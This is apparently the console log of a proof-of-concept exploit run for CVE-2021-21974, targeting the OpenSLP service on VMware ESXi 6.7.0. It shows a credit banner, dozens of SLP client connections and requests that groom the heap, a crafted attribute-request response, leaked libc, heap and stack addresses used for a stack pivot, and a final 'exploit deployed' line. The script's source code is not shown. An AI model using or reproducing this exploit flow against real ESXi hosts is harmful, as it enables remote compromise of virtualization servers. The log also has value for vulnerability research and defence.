   _____   _____   ___ __ ___ _    ___ _ ___ ____ _ _       
  / __\ \ / / __|_|_  )  \_  ) |__|_  ) / _ \__  | | |      
 | (__ \ V /| _|___/ / () / /| |___/ /| \_, / / /|_  _|     
  \___| \_/ |___| /___\__/___|_|  /___|_|/_/ /_/   |_|      

                       PoC Exploit                          

      vuln discovered by: Lucas Leong (@_wmliang_)          
           poc by: Johnny Yu (@straight_blast)              
                                                            

           currently support the following:                 
         [1] VMware ESXi 6.7.0 build-14320388               
         [2] VMware ESXi 6.7.0 build-16316930               

[SLP Client-1] connect
[SLP Client-1] directory agent advertisement
[SLP Client-2] connect
[SLP Client-3] connect
[SLP Client-4] connect
[SLP Client-5] connect
[SLP Client-2] service request
[SLP Client-3] service request
[SLP Client-4] service request
[SLP Client-5] service request
[SLP Client-6] connect
[SLP Client-6] service request
[SLP Client-7] connect
[SLP Client-8] connect
[SLP Client-1] recv:  b''
[SLP Client-2] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-3] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-4] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-5] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-6] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-6] close
[SLP Client-9] connect
[SLP Client-9] directory agent advertisement
[SLP Client-9] recv:  b''
[SLP Client-8] service request
[SLP Client-8] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-7] service registration
[SLP Client-7] recv:  b'\x02\x05\x00\x00\x12\x00\x00\x00\x00\x00\x00\x14\x00\x02en\x00\x00'
[SLP Client-8] service request
[SLP Client-8] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-10] connect
[SLP Client-10] service request
[SLP Client-10] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-11] connect
[SLP Client-12] connect
[SLP Client-13] connect
[SLP Client-11] service request
[SLP Client-11] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-14] connect
[SLP Client-14] service request
[SLP Client-14] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-12] service request
[SLP Client-12] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-14] close
[SLP Client-15] connect
[SLP Client-15] attribute request
[SLP Client-15] recv:  b'\x02\x07\x002\x00\x80\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x001\xeb\xef\xbe\xad\xdeBBBBBBBB'
[SLP Client-13] service request
[SLP Client-13] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-16] connect
[SLP Client-17] connect
[SLP Client-12] close
[SLP Client-18] connect
[SLP Client-18] directory agent advertisement
[SLP Client-18] recv:  b''
[SLP Client-17] service request
[SLP Client-17] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-19] connect
[SLP Client-19] service request
[SLP Client-19] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-11] close
[SLP Client-20] connect
[SLP Client-20] directory agent advertisement
[SLP Client-20] recv:  b''
[SLP Client-16] service request
[SLP Client-16] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-16] service request
[SLP Client-16] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-21] connect
[SLP Client-21] service request
[SLP Client-21] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-22] connect
[SLP Client-22] service request
[SLP Client-22] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-23] connect
[SLP Client-23] service request
[SLP Client-23] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-24] connect
[SLP Client-24] service request
[SLP Client-24] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-23] close
[SLP Client-25] connect
[SLP Client-25] service request
[SLP Client-25] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-27] connect
[SLP Client-28] connect
[SLP Client-24] close
[SLP Client-26] connect
[SLP Client-26] directory agent advertisement
[SLP Client-26] recv:  b''
[SLP Client-27] service request
[SLP Client-27] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-29] connect
[SLP Client-29] service request
[SLP Client-29] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-22] close
[SLP Client-30] connect
[SLP Client-30] directory agent advertisement
[SLP Client-30] recv:  b''
[SLP Client-28] service request
[SLP Client-28] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-28] service request
[SLP Client-28] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-31] connect
[SLP Client-31] service request
[SLP Client-31] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-27] service request
[SLP Client-27] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-28] service request
[SLP Client-28] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'

[+] libc base address:  0xa01c000
[+] libc system address:  0xa05a390
[+] libc environ address:  0xa1b0e20
[+] libc __free_hook address:  0xa1b08d8
[+] ret address:  0xa09c09c
[+] gadget address:  0xa09be01
[+] heap address:  0x8e0e924
[+] shell command address:  0x8e0e958
[+] stack enviorn address:  0xffc13f60
[+] esp value:  0xffc13130
[+] pivoted esp value:  0xffc13230

[SLP Client-28] service request
[SLP Client-28] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-32] connect
[SLP Client-32] service request
[SLP Client-32] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-33] connect
[SLP Client-34] connect
[SLP Client-34] service request
[SLP Client-34] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-33] service request
[SLP Client-33] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-35] connect
[SLP Client-36] connect
[SLP Client-34] close
[SLP Client-37] connect
[SLP Client-37] directory agent advertisement
[SLP Client-37] recv:  b''
[SLP Client-36] service request
[SLP Client-36] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-38] connect
[SLP Client-38] service request
[SLP Client-38] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-32] close
[SLP Client-39] connect
[SLP Client-39] directory agent advertisement
[SLP Client-39] recv:  b''
[SLP Client-35] service request
[SLP Client-35] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-40] connect
[SLP Client-40] service request
[SLP Client-40] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-36] service request
[SLP Client-36] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-35] service request
[SLP Client-35] recv:  b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-33] service request
[SLP Client-33] recv:  b''
[SLP Client-36] service request
[SLP Client-36] recv:  b''
[SLP Client-35] service request
[SLP Client-35] recv:  b''
[SLP Client-33] service request
[SLP Client-33] recv:  b''
[SLP Client-36] service request
Exception in thread Thread-36:
Traceback (most recent call last):
  File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
    self.run()
  File "/home/tijl/./CVE-2021-21974.py", line 63, in run
    s.send(outgoing)
BrokenPipeError: [Errno 32] Broken pipe
[SLP Client-35] service request
Exception in thread Thread-35:
Traceback (most recent call last):
  File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
    self.run()
  File "/home/tijl/./CVE-2021-21974.py", line 63, in run
    s.send(outgoing)
BrokenPipeError: [Errno 32] Broken pipe
[SLP Client-33] service request
Exception in thread Thread-33:
Traceback (most recent call last):
  File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
    self.run()
  File "/home/tijl/./CVE-2021-21974.py", line 63, in run
    s.send(outgoing)
BrokenPipeError: [Errno 32] Broken pipe
[*] exploit deployed